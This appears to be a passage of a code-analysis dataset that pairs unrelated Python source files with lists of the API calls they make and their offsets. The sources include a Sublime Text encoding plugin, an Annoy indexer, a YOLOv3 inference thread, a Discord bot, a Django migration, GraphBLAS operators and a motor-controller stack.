self.view.replace(edit, region, new_string)
def get_method(self, encode_type):
if 'punycode_encode' == encode_type:
return codec_idn.punycode_encode
elif 'punycode_decode' == encode_type:
return codec_idn.punycode_decode
elif 'idna_encode' == encode_type:
return codec_idn.idna_encode
elif 'idna_decode' == encode_type:
return codec_idn.idna_decode
elif 'idna2008_encode' == encode_type:
return codec_idn.idna2008_encode
elif 'idna2008_decode' == encode_type:
return codec_idn.idna2008_decode
elif 'idna2008uts46_encode' == encode_type:
return codec_idn.idna2008uts46_encode
elif 'idna2008uts46_decode' == encode_type:
return codec_idn.idna2008uts46_decode
elif 'idna2008transitional_encode' == encode_type:
return codec_idn.idna2008transitional_encode
elif 'idna2008transitional_decode' == encode_type:
return codec_idn.idna2008transitional_decode
else:
raise NotImplementedError("unknown encoding type %s" % (str(encode_type),))
"""
Sublime Text 3 Base62 Codec
"""
class Base62EncodeCommand(sublime_plugin.TextCommand):
def run(self, edit, encode_type='b62encode'):
for region in selected_regions(self.view):
if not region.empty():
original_string = self.view.substr(region)
if 'b62encode_int' == encode_type:
encoded_string = codec_base62.b62encode_int(original_string.encode("UTF-8"))
elif 'b62decode_int' == encode_type:
encoded_string = codec_base62.b62decode_int(original_string.encode("UTF-8"))
elif 'b62encode_inv_int' == encode_type:
encoded_string = codec_base62.b62encode_inv_int(original_string.encode("UTF-8"))
elif 'b62decode_inv_int' == encode_type:
encoded_string = codec_base62.b62decode_inv_int(original_string.encode("UTF-8"))
elif 'b62encode_hex' == encode_type:
encoded_string = codec_base62.b62encode_hex(original_string.encode("UTF-8"))
elif 'b62decode_hex' == encode_type:
encoded_string = codec_base62.b62decode_hex(original_string.encode("UTF-8"))
elif 'b62encode_inv_hex' == encode_type:
encoded_string = codec_base62.b62encode_inv_hex(original_string.encode("UTF-8"))
elif 'b62decode_inv_hex' == encode_type:
encoded_string = codec_base62.b62decode_inv_hex(original_string.encode("UTF-8"))
else:
print("unsupported operation %s" % (encode_type,))
break
self.view.replace(edit, region, encoded_string.decode("UTF-8"))
|
[
"sublime.load_settings",
"hashlib.new"
] |
[((1462, 1498), 'sublime.load_settings', 'sublime.load_settings', (['SETTINGS_FILE'], {}), '(SETTINGS_FILE)\n', (1483, 1498), False, 'import sublime, sublime_plugin\n'), ((1634, 1670), 'sublime.load_settings', 'sublime.load_settings', (['SETTINGS_FILE'], {}), '(SETTINGS_FILE)\n', (1655, 1670), False, 'import sublime, sublime_plugin\n'), ((6644, 6673), 'hashlib.new', 'hashlib.new', (['secure_hash_type'], {}), '(secure_hash_type)\n', (6655, 6673), False, 'import hashlib\n'), ((7732, 7761), 'hashlib.new', 'hashlib.new', (['secure_hash_type'], {}), '(secure_hash_type)\n', (7743, 7761), False, 'import hashlib\n'), ((4309, 4345), 'sublime.load_settings', 'sublime.load_settings', (['SETTINGS_FILE'], {}), '(SETTINGS_FILE)\n', (4330, 4345), False, 'import sublime, sublime_plugin\n')]
|
from interfaces.ANNIndexer import ANNIndexer
import annoy
# Usage : indexer = AnnoyIndexer(vector_length=100, n_trees=1000)
class AnnoyIndexer(ANNIndexer):
def __init__(self, content_vectors, vector_length=100, n_trees=10):
print("initializing annoy wrapper")
self.vector_length = vector_length
self.n_trees = n_trees
self.index = annoy.AnnoyIndex(vector_length)
self.content_vectors = content_vectors
def build_index(self, path=None):
print("building index")
print("len of docvecs", self.content_vectors.size())
vectors_map = self.content_vectors.get_vectors_map()
for key in vectors_map:
try:
self.index.add_item(key, vectors_map[key])
except Exception as e:
print("problem adding to index for id : " + str(key), e)
# vectors.apply(lambda df_item: self.index.add_item(df_item.name, df_item['vector']))
print(self.index.build(self.n_trees))
print("items in index - ", self.index.get_n_items())
def save(self, path):
self.index.save(path)
def load(self, path):
self.index.load(path)
def find_NN_by_id(self, query_id, n=10):
return self.index.get_nns_by_item(query_id, n)
def find_NN_by_vector(self, query_vector, n=10):
return self.index.get_nns_by_vector(query_vector, n)
|
[
"annoy.AnnoyIndex"
] |
[((351, 382), 'annoy.AnnoyIndex', 'annoy.AnnoyIndex', (['vector_length'], {}), '(vector_length)\n', (367, 382), False, 'import annoy\n')]
|
import time
import threading
import numpy as np
from common import preprocess_one_image_fn, draw_outputs, load_classes, generate_colors
from yolo_utils import yolo_eval
from priority_queue import PriorityQueue
class YOLOv3Thread(threading.Thread):
def __init__(self, runner: "Runner", deque_input, lock_input,
deque_output, lock_output, thread_name):
super(YOLOv3Thread, self).__init__(name=thread_name)
self.runner = runner
self.deque_input = deque_input
self.lock_input = lock_input
self.deque_output = deque_output
self.lock_output = lock_output
self.class_names = load_classes('./model_data/adas_classes.txt')
self.colors = generate_colors(self.class_names)
def set_input_image(self, input_run, frame, size):
w, h = size
img = preprocess_one_image_fn(frame, w, h)
input_run[0, ...] = img.reshape((h, w, 3))
def run(self):
# Get input/output tensors and dims
inputTensors = self.runner.get_input_tensors()
outputTensors = self.runner.get_output_tensors()
input_ndim = tuple(inputTensors[0].dims) # (1, 256, 512, 3)
result0_ndim = tuple(outputTensors[0].dims) # (1, 8, 16, 40)
result1_ndim = tuple(outputTensors[1].dims) # (1, 16, 32, 40)
result2_ndim = tuple(outputTensors[2].dims) # (1, 32, 64, 40)
result3_ndim = tuple(outputTensors[3].dims) # (1, 64, 126, 40)
# input/output data define
input_data = [np.empty(input_ndim, dtype=np.float32, order="C")]
result0 = np.empty(result0_ndim, dtype=np.float32, order="C")
result1 = np.empty(result1_ndim, dtype=np.float32, order="C")
result2 = np.empty(result2_ndim, dtype=np.float32, order="C")
result3 = np.empty(result3_ndim, dtype=np.float32, order="C")
results = [result0, result1, result2, result3]
# get input width, height for preprocess
input_shape = (input_ndim[2], input_ndim[1])
while True:
self.lock_input.acquire()
# empy
if not self.deque_input:
self.lock_input.release()
continue
else:
# get input frame from input frames queue
data_from_deque = self.deque_input[0]
self.deque_input.popleft()
self.lock_input.release()
# Init input image to input buffers
img = data_from_deque['img']
idx = data_from_deque['idx']
start_time = data_from_deque['time']
self.set_input_image(input_data[0], img, input_shape)
# invoke the running of DPU for yolov3
"""Benchmark DPU FPS performance over Vitis AI APIs `execute_async()` and `wait()`"""
# (self: vart.Runner, arg0: List[buffer], arg1: List[buffer]) -> Tuple[int, int]
job_id = self.runner.execute_async(input_data, results)
self.runner.wait(job_id)
self.post_process(img, results, input_shape)
self.lock_output.acquire()
img_info = PriorityQueue(idx, img, start_time)
self.deque_output.append(img_info)
self.deque_output.sort()
self.lock_output.release()
def post_process(self, image, results, input_ndim):
"""Xilinx ADAS detction model: YOLOv3
Name: yolov3_adas_pruned_0_9
Input shape: (256, 512, 3)
Classe: 3
Anchor: 5, for detail please see `yolo_utils.py`
Outputs: 4
outputs_node: {
"layer81_conv",
"layer93_conv",
"layer105_conv",
"layer117_conv",
}
"""
image_shape = (image.shape[1], image.shape[0]) # (w, h)
scores, boxes, classes = yolo_eval(
results,
image_shape=image_shape,
input_ndim=input_ndim,
classes=3,
score_threshold=0.5,
iou_threshold=0.7)
# print("detection:")
# for i in range(scores.shape[0]):
# print("\t{}, {}, {}".format(
# self.class_names[int(classes[i])], scores[i], boxes[i]
# ))
image = draw_outputs(image, (scores, boxes, classes),
self.class_names, self.colors)
|
[
"common.preprocess_one_image_fn",
"common.draw_outputs",
"yolo_utils.yolo_eval",
"priority_queue.PriorityQueue",
"numpy.empty",
"common.generate_colors",
"common.load_classes"
] |
[((651, 696), 'common.load_classes', 'load_classes', (['"""./model_data/adas_classes.txt"""'], {}), "('./model_data/adas_classes.txt')\n", (663, 696), False, 'from common import preprocess_one_image_fn, draw_outputs, load_classes, generate_colors\n'), ((719, 752), 'common.generate_colors', 'generate_colors', (['self.class_names'], {}), '(self.class_names)\n', (734, 752), False, 'from common import preprocess_one_image_fn, draw_outputs, load_classes, generate_colors\n'), ((843, 879), 'common.preprocess_one_image_fn', 'preprocess_one_image_fn', (['frame', 'w', 'h'], {}), '(frame, w, h)\n', (866, 879), False, 'from common import preprocess_one_image_fn, draw_outputs, load_classes, generate_colors\n'), ((1587, 1638), 'numpy.empty', 'np.empty', (['result0_ndim'], {'dtype': 'np.float32', 'order': '"""C"""'}), "(result0_ndim, dtype=np.float32, order='C')\n", (1595, 1638), True, 'import numpy as np\n'), ((1657, 1708), 'numpy.empty', 'np.empty', (['result1_ndim'], {'dtype': 'np.float32', 'order': '"""C"""'}), "(result1_ndim, dtype=np.float32, order='C')\n", (1665, 1708), True, 'import numpy as np\n'), ((1727, 1778), 'numpy.empty', 'np.empty', (['result2_ndim'], {'dtype': 'np.float32', 'order': '"""C"""'}), "(result2_ndim, dtype=np.float32, order='C')\n", (1735, 1778), True, 'import numpy as np\n'), ((1797, 1848), 'numpy.empty', 'np.empty', (['result3_ndim'], {'dtype': 'np.float32', 'order': '"""C"""'}), "(result3_ndim, dtype=np.float32, order='C')\n", (1805, 1848), True, 'import numpy as np\n'), ((3831, 3953), 'yolo_utils.yolo_eval', 'yolo_eval', (['results'], {'image_shape': 'image_shape', 'input_ndim': 'input_ndim', 'classes': '(3)', 'score_threshold': '(0.5)', 'iou_threshold': '(0.7)'}), '(results, image_shape=image_shape, input_ndim=input_ndim, classes=\n 3, score_threshold=0.5, iou_threshold=0.7)\n', (3840, 3953), False, 'from yolo_utils import yolo_eval\n'), ((4246, 4322), 'common.draw_outputs', 'draw_outputs', (['image', '(scores, boxes, classes)', 'self.class_names', 'self.colors'], {}), '(image, (scores, boxes, classes), self.class_names, self.colors)\n', (4258, 4322), False, 'from common import preprocess_one_image_fn, draw_outputs, load_classes, generate_colors\n'), ((1518, 1567), 'numpy.empty', 'np.empty', (['input_ndim'], {'dtype': 'np.float32', 'order': '"""C"""'}), "(input_ndim, dtype=np.float32, order='C')\n", (1526, 1567), True, 'import numpy as np\n'), ((3120, 3155), 'priority_queue.PriorityQueue', 'PriorityQueue', (['idx', 'img', 'start_time'], {}), '(idx, img, start_time)\n', (3133, 3155), False, 'from priority_queue import PriorityQueue\n')]
|
# WARNING: Please don't edit this file. It was generated by Python/WinRT v1.0.0-beta.4
import enum
import winsdk
_ns_module = winsdk._import_ns_module("Windows.Web.UI")
try:
import winsdk.windows.applicationmodel.datatransfer
except Exception:
pass
try:
import winsdk.windows.foundation
except Exception:
pass
try:
import winsdk.windows.foundation.collections
except Exception:
pass
try:
import winsdk.windows.storage.streams
except Exception:
pass
try:
import winsdk.windows.ui
except Exception:
pass
try:
import winsdk.windows.web
except Exception:
pass
try:
import winsdk.windows.web.http
except Exception:
pass
class WebViewControlPermissionState(enum.IntEnum):
UNKNOWN = 0
DEFER = 1
ALLOW = 2
DENY = 3
class WebViewControlPermissionType(enum.IntEnum):
GEOLOCATION = 0
UNLIMITED_INDEXED_D_B_QUOTA = 1
MEDIA = 2
POINTER_LOCK = 3
WEB_NOTIFICATIONS = 4
SCREEN = 5
IMMERSIVE_VIEW = 6
WebViewControlContentLoadingEventArgs = _ns_module.WebViewControlContentLoadingEventArgs
WebViewControlDOMContentLoadedEventArgs = _ns_module.WebViewControlDOMContentLoadedEventArgs
WebViewControlDeferredPermissionRequest = _ns_module.WebViewControlDeferredPermissionRequest
WebViewControlLongRunningScriptDetectedEventArgs = _ns_module.WebViewControlLongRunningScriptDetectedEventArgs
WebViewControlNavigationCompletedEventArgs = _ns_module.WebViewControlNavigationCompletedEventArgs
WebViewControlNavigationStartingEventArgs = _ns_module.WebViewControlNavigationStartingEventArgs
WebViewControlNewWindowRequestedEventArgs = _ns_module.WebViewControlNewWindowRequestedEventArgs
WebViewControlPermissionRequest = _ns_module.WebViewControlPermissionRequest
WebViewControlPermissionRequestedEventArgs = _ns_module.WebViewControlPermissionRequestedEventArgs
WebViewControlScriptNotifyEventArgs = _ns_module.WebViewControlScriptNotifyEventArgs
WebViewControlSettings = _ns_module.WebViewControlSettings
WebViewControlUnsupportedUriSchemeIdentifiedEventArgs = _ns_module.WebViewControlUnsupportedUriSchemeIdentifiedEventArgs
WebViewControlUnviewableContentIdentifiedEventArgs = _ns_module.WebViewControlUnviewableContentIdentifiedEventArgs
WebViewControlWebResourceRequestedEventArgs = _ns_module.WebViewControlWebResourceRequestedEventArgs
IWebViewControl = _ns_module.IWebViewControl
IWebViewControl2 = _ns_module.IWebViewControl2
|
[
"winsdk._import_ns_module"
] |
[((129, 171), 'winsdk._import_ns_module', 'winsdk._import_ns_module', (['"""Windows.Web.UI"""'], {}), "('Windows.Web.UI')\n", (153, 171), False, 'import winsdk\n')]
|
import discord
from discord.ext import commands
import json
import glob
import time
import os
import motor.motor_asyncio as motor
import logging
import sys
from cogs.utils.guild_features import GuildFeatures
class Schezo(commands.Bot):
__slots__ = 'config', 'start_time', '_cogs_loaded', 'db_client', 'db', 'logger', 'gf'
def __init__(self):
if not os.path.exists('bot_config.json'):
raise FileNotFoundError('Could not find "bot_config.json". Make sure to copy and rename the template and then change the values.')
with open('bot_config.json', 'r', encoding='utf-8') as file:
self.config = json.load(file)
intents = discord.Intents(
# These are both true for s.played
# although that command might be removed entirely in the future
presences=True,
members=True,
reactions=True,
messages=True,
guilds=True,
typing=False,
invites=False,
webhooks=False,
integrations=False,
emojis=False,
bans=False,
voice_states=False,
)
super().__init__(command_prefix=self.config['prefix'], intents=intents)
self.start_time = time.time()
self._cogs_loaded = False
self.db_client = motor.AsyncIOMotorClient('localhost', 27017, retryWrites=self.config.get('retrywrites', True))
self.db = self.db_client[self.config['dbname']]
self.gf: GuildFeatures = GuildFeatures(self.db)
self.logger = logging.getLogger('schezo')
formatter = logging.Formatter('[{asctime} {levelname}] {message}', datefmt='%d/%m/%Y %H:%M', style='{')
file_handler = logging.FileHandler('schezo.log', mode='w')
file_handler.setFormatter(formatter)
self.logger.setLevel(logging.INFO)
self.logger.addHandler(file_handler)
self.logger.propagate = False
@property
def uptime(self):
return time.time() - self.start_time
async def on_ready(self):
msg = f'Logged in as {self.user}'
print(msg)
self.logger.info(msg)
game = discord.Activity(name=self.config['game'], type=discord.ActivityType.watching)
await self.change_presence(activity=game)
self.load_cogs()
def get_cogs(self):
files = glob.glob('cogs/*.py')
# Replace / or \ with . and remove .py at the end
return map(lambda p: p.replace('\\','.').replace('/','.')[:-3], files)
def load_cogs(self):
if self._cogs_loaded: return
self._cogs_loaded = True
for cog in self.get_cogs():
self.load_extension(cog)
def unload_cogs(self):
self._cogs_loaded = False
extensions = tuple(self.extensions.keys())
for cog in extensions:
self.unload_extension(cog)
def run(self):
super().run(self.config['token'])
bot = Schezo()
@bot.command(hidden=True, aliases=['rc'])
@commands.is_owner()
async def reloadcogs(ctx):
ctx.bot.unload_cogs()
modules = tuple(sys.modules.keys())
for name in modules:
if name.startswith('cogs.utils'):
del sys.modules[name]
ctx.bot.load_cogs()
try:
await ctx.message.add_reaction('๐')
except discord.DiscordException:
pass
bot.run()
|
[
"discord.Activity",
"json.load",
"logging.FileHandler",
"sys.modules.keys",
"os.path.exists",
"time.time",
"logging.Formatter",
"discord.Intents",
"glob.glob",
"cogs.utils.guild_features.GuildFeatures",
"discord.ext.commands.is_owner",
"logging.getLogger"
] |
[((3002, 3021), 'discord.ext.commands.is_owner', 'commands.is_owner', ([], {}), '()\n', (3019, 3021), False, 'from discord.ext import commands\n'), ((682, 891), 'discord.Intents', 'discord.Intents', ([], {'presences': '(True)', 'members': '(True)', 'reactions': '(True)', 'messages': '(True)', 'guilds': '(True)', 'typing': '(False)', 'invites': '(False)', 'webhooks': '(False)', 'integrations': '(False)', 'emojis': '(False)', 'bans': '(False)', 'voice_states': '(False)'}), '(presences=True, members=True, reactions=True, messages=True,\n guilds=True, typing=False, invites=False, webhooks=False, integrations=\n False, emojis=False, bans=False, voice_states=False)\n', (697, 891), False, 'import discord\n'), ((1273, 1284), 'time.time', 'time.time', ([], {}), '()\n', (1282, 1284), False, 'import time\n'), ((1529, 1551), 'cogs.utils.guild_features.GuildFeatures', 'GuildFeatures', (['self.db'], {}), '(self.db)\n', (1542, 1551), False, 'from cogs.utils.guild_features import GuildFeatures\n'), ((1575, 1602), 'logging.getLogger', 'logging.getLogger', (['"""schezo"""'], {}), "('schezo')\n", (1592, 1602), False, 'import logging\n'), ((1623, 1719), 'logging.Formatter', 'logging.Formatter', (['"""[{asctime} {levelname}] {message}"""'], {'datefmt': '"""%d/%m/%Y %H:%M"""', 'style': '"""{"""'}), "('[{asctime} {levelname}] {message}', datefmt=\n '%d/%m/%Y %H:%M', style='{')\n", (1640, 1719), False, 'import logging\n'), ((1738, 1781), 'logging.FileHandler', 'logging.FileHandler', (['"""schezo.log"""'], {'mode': '"""w"""'}), "('schezo.log', mode='w')\n", (1757, 1781), False, 'import logging\n'), ((2173, 2251), 'discord.Activity', 'discord.Activity', ([], {'name': "self.config['game']", 'type': 'discord.ActivityType.watching'}), "(name=self.config['game'], type=discord.ActivityType.watching)\n", (2189, 2251), False, 'import discord\n'), ((2368, 2390), 'glob.glob', 'glob.glob', (['"""cogs/*.py"""'], {}), "('cogs/*.py')\n", (2377, 2390), False, 'import glob\n'), ((3095, 3113), 'sys.modules.keys', 'sys.modules.keys', ([], {}), '()\n', (3111, 3113), False, 'import sys\n'), ((366, 399), 'os.path.exists', 'os.path.exists', (['"""bot_config.json"""'], {}), "('bot_config.json')\n", (380, 399), False, 'import os\n'), ((639, 654), 'json.load', 'json.load', (['file'], {}), '(file)\n', (648, 654), False, 'import json\n'), ((2006, 2017), 'time.time', 'time.time', ([], {}), '()\n', (2015, 2017), False, 'import time\n')]
|
# Generated by Django 3.0.7 on 2020-07-04 10:55
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('photologue', '0012_auto_20200704_0747'),
]
operations = [
migrations.AddField(
model_name='photo',
name='source',
field=models.TextField(blank=True, verbose_name='source'),
),
]
|
[
"django.db.models.TextField"
] |
[((336, 387), 'django.db.models.TextField', 'models.TextField', ([], {'blank': '(True)', 'verbose_name': '"""source"""'}), "(blank=True, verbose_name='source')\n", (352, 387), False, 'from django.db import migrations, models\n')]
|
"""Contains all automatically generated BinaryOps from CFFI.
"""
__all__ = [
"BinaryOp",
"Accum",
"current_binop",
"current_accum",
"binary_op",
]
import sys
import re
import contextvars
from itertools import chain
from collections import defaultdict
from functools import partial
import numba
from .base import lib, ffi, _check
from . import types
current_accum = contextvars.ContextVar("current_accum")
current_binop = contextvars.ContextVar("current_binop")
class BinaryOp:
"""Wrapper around GrB_BinaryOp."""
def __init__(self, op, typ, binaryop, udt=None, boolean=False):
if udt is not None: # pragma: no cover
o = ffi.new("GrB_BinaryOp*")
udt = udt._gb_type
lib.GrB_BinaryOp_new(
o,
ffi.cast("GxB_binary_function", binaryop.address),
lib.GrB_BOOL if boolean else udt,
udt,
udt,
)
self.binaryop = o[0]
else:
self.binaryop = binaryop
cls = getattr(types, typ)
setattr(cls, op, self)
setattr(cls, op.lower(), self)
self.name = "_".join((op, typ))
self.__doc__ = self.name
self.token = None
def __enter__(self):
self.token = current_binop.set(self)
return self
def __exit__(self, *errors): # pragma: nocover
current_binop.reset(self.token)
return False
def __call__(self, A, B, *args, **kwargs):
return A.emult(B, self, *args, **kwargs)
def get_op(self):
return self.binaryop
def print(self, level=2, name="", f=sys.stdout): # pragma: nocover
"""Print the matrix using `GxB_Matrix_fprint()`, by default to
`sys.stdout`.
Level 1: Short description
Level 2: Short list, short numbers
Level 3: Long list, short number
Level 4: Short list, long numbers
Level 5: Long list, long numbers
"""
_check(lib.GxB_BinaryOp_fprint(self.binaryop, bytes(name, "utf8"), level, f))
class Accum:
"""Helper context manager to specify accumulator binary operator in
overloaded operator contexts like `@`. This disambiguates for
methods like `Matrix.eadd` and `Matrix.emult` that can specify
both a binary operators *and* a binary accumulator.
See those methods and `Matrix.mxm` for examples.
"""
__slots__ = ("binaryop", "token")
def __init__(self, binaryop):
self.binaryop = binaryop
def __enter__(self):
self.token = current_accum.set(self.binaryop)
return self
def __exit__(self, *errors):
current_accum.reset(self.token)
return False
grb_binop_re = re.compile(
"^(GrB|GxB)_(FIRST|SECOND|MIN|MAX|PLUS|MINUS|RMINUS|TIMES|DIV|RDIV|"
"FIRSTI|FIRSTI1|FIRSTJ|FIRSTJ1|SECONDI|SECONDI1|SECONDJ|SECONDJ1|"
"PAIR|ANY|POW|EQ|NE|GT|LT|GE|LE|LOR|LAND|LXOR|BOR|BAND|BXOR|BXNOR|"
"ATAN2|HYPOT|FMOD|REMAINDER|LDEXP|COPYSIGN|BGET|BSET|BCLR|BSHIFT|CMPLX)_"
"(BOOL|UINT8|UINT16|UINT32|UINT64|INT8|INT16|INT32|INT64|FP32|FP64|FC32|FC64)$"
)
pure_bool_re = re.compile("^(GrB|GxB)_(LOR|LAND|LXOR)_(BOOL)$")
def binop_group(reg):
srs = []
for n in filter(None, [reg.match(i) for i in dir(lib)]):
prefix, op, typ = n.groups()
srs.append(BinaryOp(op, typ, getattr(lib, n.string)))
return srs
def build_binaryops(__pdoc__):
import tempfile
this = sys.modules[__name__]
for r in chain(binop_group(grb_binop_re), binop_group(pure_bool_re)):
setattr(this, r.name, r)
this.__all__.append(r.name)
op, typ = r.name.split("_")
f = tempfile.TemporaryFile()
r.print(f=f)
f.seek(0)
__pdoc__[f"{typ}.{op}"] = f"""```{str(f.read(), 'utf8')}```"""
def binary_op(arg_type, nopython=True):
"""Decorator to jit-compile Python function into a GrB_BinaryOp
object.
>>> from random import uniform
>>> from pygraphblas import Matrix, binary_op, types, gviz
>>> @binary_op(types.FP64)
... def uniform(x, y):
... return uniform(x, y)
>>> A = Matrix.dense(types.FP64, 3, 3, fill=0)
>>> B = A.dup()
>>> with uniform:
... A += 1
Calling `A += 1` with the `uniform` binary operator is the same as
calling `apply_second` with an `out` parameter:
>>> B.apply_second(uniform, 1, out=B) is B
True
>>> ga = gviz.draw_matrix(A, scale=40,
... filename='docs/imgs/binary_op_A')
>>> gb = gviz.draw_matrix(B, scale=40,
... filename='docs/imgs/binary_op_B')
 
"""
def inner(func):
func_name = func.__name__
sig = numba.void(
numba.types.CPointer(arg_type._numba_t),
numba.types.CPointer(arg_type._numba_t),
numba.types.CPointer(arg_type._numba_t),
)
jitfunc = numba.jit(func, nopython=nopython)
@numba.cfunc(sig, nopython=True)
def wrapper(z, x, y): # pragma: no cover
result = jitfunc(x[0], y[0])
z[0] = result
out = ffi.new("GrB_BinaryOp*")
lib.GrB_BinaryOp_new(
out,
ffi.cast("GxB_binary_function", wrapper.address),
arg_type._gb_type,
arg_type._gb_type,
arg_type._gb_type,
)
return BinaryOp(func_name, arg_type.__name__, out[0])
return inner
|
[
"numba.types.CPointer",
"tempfile.TemporaryFile",
"numba.jit",
"contextvars.ContextVar",
"numba.cfunc",
"re.compile"
] |
[((390, 429), 'contextvars.ContextVar', 'contextvars.ContextVar', (['"""current_accum"""'], {}), "('current_accum')\n", (412, 429), False, 'import contextvars\n'), ((446, 485), 'contextvars.ContextVar', 'contextvars.ContextVar', (['"""current_binop"""'], {}), "('current_binop')\n", (468, 485), False, 'import contextvars\n'), ((2738, 3105), 're.compile', 're.compile', (['"""^(GrB|GxB)_(FIRST|SECOND|MIN|MAX|PLUS|MINUS|RMINUS|TIMES|DIV|RDIV|FIRSTI|FIRSTI1|FIRSTJ|FIRSTJ1|SECONDI|SECONDI1|SECONDJ|SECONDJ1|PAIR|ANY|POW|EQ|NE|GT|LT|GE|LE|LOR|LAND|LXOR|BOR|BAND|BXOR|BXNOR|ATAN2|HYPOT|FMOD|REMAINDER|LDEXP|COPYSIGN|BGET|BSET|BCLR|BSHIFT|CMPLX)_(BOOL|UINT8|UINT16|UINT32|UINT64|INT8|INT16|INT32|INT64|FP32|FP64|FC32|FC64)$"""'], {}), "(\n '^(GrB|GxB)_(FIRST|SECOND|MIN|MAX|PLUS|MINUS|RMINUS|TIMES|DIV|RDIV|FIRSTI|FIRSTI1|FIRSTJ|FIRSTJ1|SECONDI|SECONDI1|SECONDJ|SECONDJ1|PAIR|ANY|POW|EQ|NE|GT|LT|GE|LE|LOR|LAND|LXOR|BOR|BAND|BXOR|BXNOR|ATAN2|HYPOT|FMOD|REMAINDER|LDEXP|COPYSIGN|BGET|BSET|BCLR|BSHIFT|CMPLX)_(BOOL|UINT8|UINT16|UINT32|UINT64|INT8|INT16|INT32|INT64|FP32|FP64|FC32|FC64)$'\n )\n", (2748, 3105), False, 'import re\n'), ((3146, 3194), 're.compile', 're.compile', (['"""^(GrB|GxB)_(LOR|LAND|LXOR)_(BOOL)$"""'], {}), "('^(GrB|GxB)_(LOR|LAND|LXOR)_(BOOL)$')\n", (3156, 3194), False, 'import re\n'), ((3685, 3709), 'tempfile.TemporaryFile', 'tempfile.TemporaryFile', ([], {}), '()\n', (3707, 3709), False, 'import tempfile\n'), ((4975, 5009), 'numba.jit', 'numba.jit', (['func'], {'nopython': 'nopython'}), '(func, nopython=nopython)\n', (4984, 5009), False, 'import numba\n'), ((5020, 5051), 'numba.cfunc', 'numba.cfunc', (['sig'], {'nopython': '(True)'}), '(sig, nopython=True)\n', (5031, 5051), False, 'import numba\n'), ((4800, 4839), 'numba.types.CPointer', 'numba.types.CPointer', (['arg_type._numba_t'], {}), '(arg_type._numba_t)\n', (4820, 4839), False, 'import numba\n'), ((4853, 4892), 'numba.types.CPointer', 'numba.types.CPointer', (['arg_type._numba_t'], {}), '(arg_type._numba_t)\n', (4873, 4892), False, 'import numba\n'), ((4906, 4945), 'numba.types.CPointer', 'numba.types.CPointer', (['arg_type._numba_t'], {}), '(arg_type._numba_t)\n', (4926, 4945), False, 'import numba\n')]
|
import serial
from time import sleep, localtime, strftime, time
from smc100py3 import SMC100CC
"""
Controller class for stack of SMC100CC drivers.
It makes easier to handle multiple controllers.
Requires smc100py3.py module.
Example:
ConstructionDict = {
1 : (1, None, 0),
2 : (2, None, 0),
3 : (3, "My motor", 0)
}
Ms = SMCStack('COM3', ConstructionDict, 1) #init stack
Mov1 = {1: 20, 2:30} #define movement
Ms(Mov1) #perform collective movement
#...
Ms.Close() #close port at the end
"""
class SMCStack():
dT = 0.02
DEBUG = False
def __init__(self, port, ConstructionDict, MasterKey=None):
"""
Args:
port - string path to used serial port
ConstructionDict - dictionary with keys, addresses, labels and correction
MasterKey - selected key to be the constructed first, if none, first from keys is selected
"""
self.Motors = {}
if not(MasterKey in ConstructionDict.keys()):
MasterKey = sorted(ConstructionDict.keys())[0]
# Init first motor
self.Motors[MasterKey] = SMC100CC(port, *ConstructionDict[MasterKey])
self.Motors[MasterKey].DEBUG = self.DEBUG
self.port = self.Motors[MasterKey].port
sleep(self.dT)
# Init remaining motors
for key in sorted([key for key in ConstructionDict if key != MasterKey]):
addr, label, corr = ConstructionDict[key]
self.Motors[key] = SMC100CC(self.port, addr, label, corr)
self.Motors[key].DEBUG = self.DEBUG
def __call__(self, PosDict):
"""
Perform CollectiveMode().
"""
self.CollectiveMove(PosDict)
def __del__(self):
self.port.close()
def __getitem__(self, key):
return self.Motors.get(key, None)
def GetPos(self, keys=None):
Position = {}
if keys == None:
keys = sorted(self.Motors.keys())
for key in self.Motors:
if key in self.Motors:
Position[key] = self.Motors[key].get_pos()
sleep(self.dT)
return Position
def Home(self, keys=None):
"""
Untested collective home.
"""
if keys == None:
keys = self.Motors.keys()
for key in keys:
if key in self.Motors.keys():
self.Motors[key].home()
def WaitForMovement(self, keys):
"""
Wait for selected motor to finish movement.
Args:
keys: list with keys to selected motor
"""
is_moving = []
t0 = time()
for key in keys:
sleep(self.dT)
val = self.Motors[key].get_state()[0] == "28"
is_moving.append(val)
while any(is_moving) and time()-t0 < 100:
sleep(self.dT)
is_moving = []
for key in keys:
val = self.Motors[key].get_state()[0] == "28"
sleep(self.dT)
is_moving.append(val)
def CollectiveMove(self, PosDict):
"""
Efficient absolute move of multiplate motors.
Wait only for one who is travelling the most.
Start with the one with longest distance.
Args:
PosDict: dictionary of key: absolute position (deg)
"""
Current = self.GetPos()
target_keys = set(PosDict.keys())
my_keys = set(self.Motors.keys())
keys = target_keys.intersection(my_keys)
distance = {key: abs(Current[key]-PosDict[key]) for key in keys}
# sorted distance keys
distance = sorted(distance, key=lambda x: distance[x])
longest_dist = distance[-1] # key of longest-travelling motor
dist_value = abs(Current[longest_dist] - PosDict[longest_dist])
time_estim = self.Motors[longest_dist].get_mr_time(dist_value)
sleep(self.dT)
t0 = time()
for key in distance[::-1]:
self.Motors[key](PosDict[key])
sleep(self.dT)
while time()-t0 < time_estim and time()-t0 < 100: # upper limit for waiting
sleep(2*self.dT)
self.WaitForMovement(distance)
def Close(self):
self.port.close()
|
[
"smc100py3.SMC100CC",
"time.time",
"time.sleep"
] |
[((1181, 1225), 'smc100py3.SMC100CC', 'SMC100CC', (['port', '*ConstructionDict[MasterKey]'], {}), '(port, *ConstructionDict[MasterKey])\n', (1189, 1225), False, 'from smc100py3 import SMC100CC\n'), ((1335, 1349), 'time.sleep', 'sleep', (['self.dT'], {}), '(self.dT)\n', (1340, 1349), False, 'from time import sleep, localtime, strftime, time\n'), ((2727, 2733), 'time.time', 'time', ([], {}), '()\n', (2731, 2733), False, 'from time import sleep, localtime, strftime, time\n'), ((4033, 4047), 'time.sleep', 'sleep', (['self.dT'], {}), '(self.dT)\n', (4038, 4047), False, 'from time import sleep, localtime, strftime, time\n'), ((4064, 4070), 'time.time', 'time', ([], {}), '()\n', (4068, 4070), False, 'from time import sleep, localtime, strftime, time\n'), ((1555, 1593), 'smc100py3.SMC100CC', 'SMC100CC', (['self.port', 'addr', 'label', 'corr'], {}), '(self.port, addr, label, corr)\n', (1563, 1593), False, 'from smc100py3 import SMC100CC\n'), ((2773, 2787), 'time.sleep', 'sleep', (['self.dT'], {}), '(self.dT)\n', (2778, 2787), False, 'from time import sleep, localtime, strftime, time\n'), ((2948, 2962), 'time.sleep', 'sleep', (['self.dT'], {}), 